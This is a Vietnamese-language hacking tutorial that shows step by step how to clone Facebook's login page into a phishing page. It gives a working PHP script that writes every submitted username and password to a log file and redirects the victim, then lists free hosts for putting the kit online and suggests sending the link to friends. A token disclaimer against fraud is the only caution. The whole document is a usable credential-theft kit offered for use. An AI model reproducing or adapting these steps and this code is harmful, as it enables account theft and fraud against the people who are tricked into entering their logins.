Phishing là gì?
Phishing là một kỹ thuật hack phổ biến và nguy hiểm để ăn cắp thông tin bí mật của mọi người bằng cách sử dụng các trang đăng nhập giả. Trong bài viết này mình sẽ cho bạn thấy làm thế nào để tạo ra các trang đăng nhập giả mạo đơn giản ( mình sẽ demo site facebook )

Để thực hiện điều này bạn cần tạo 3 file sau :

1) .html
2) .php
3) .txt

Bước 1: 

Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình dùng facebook:
Click chuột fải và chọn xem nguồn trang ( view page source) 



Một tab mới hiện ra, bạn hãy bôi đen toàn bộ nội dung trog đó bằng cách sử dụng ctrl + A và copy & paste nó vào notepad
Và bây giờ ấn Ctrl + F trong notepad và tìm từ "action", nó có dạng như hình dưới


Còn bây giờ bạn hãy xóa toàn bộ nội dung trong dấu "ngoặc kép" 
và thay vào đó là "mail.php"
Sau đó thay tiếp từ "post" thành "get"



Xong rồi save file notepad này lại thành "facebook.html". Nếu trong lúc save mà báo lỗi này thì bạn làm như sau:



Vậy là bạn đã làm xong fake login page....

Bước 2:

Bạn mở notepad ra ra copy toàn bộ code ở dưới vào và save với tên là "mail.php"
Code:
				<?php
header ('Location: https://www.google.com/accounts/Serv...h?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
trong code có đoạn link "https://google.com.vn"
Khi ai đó click vào chữ đăng nhập trên fake page của bạn thì sẽ được chuyển hướng sang cái link đó...bạn có thể chỉnh lại cái link đó tùy theo cách sử dụng của bạn.

Bước 3:

Tạo ra tiếp 1 file nữa là "log.txt" rồi để đó.

Vậy là xong...tiếp theo các bạn upload cả 3 file này nên 1 webhosting nào đó ( các bạn có thể search trên google)
www.110mb.com
www.t35.com
www.ripway.com
www.my3gb.com ( ở đây mình chọn my3gb.com)

Nhớ là fải đăng kí đó nha  rồi mới đc up
Sau khi đăng kí xong bạn vào mục file manager, chọn upload files và upload cả 3 file vừa tạo xong 


Sau khi upload xong...link fake page của bạn sẽ có dạng "username-của-bạn.my3gb.com/facebook.html"
như ở đây username của mình là skumfuk vậy link fake page sẽ là như này:


rồi bạn send link đó sang cho bạn bè để chêu đùa nhau chặng hạn( mình ko khuyến cáo đi lừa đảo đâu nha ^^)....khi họ gõ tài khoản và pass vào đó....thì những thông tin đó sẽ được lưu lại ở file log.txt trên host. Mở file đó lên để xem ^^


Hy vọng các bạn sẽ thấy bài viết này của mình thú vị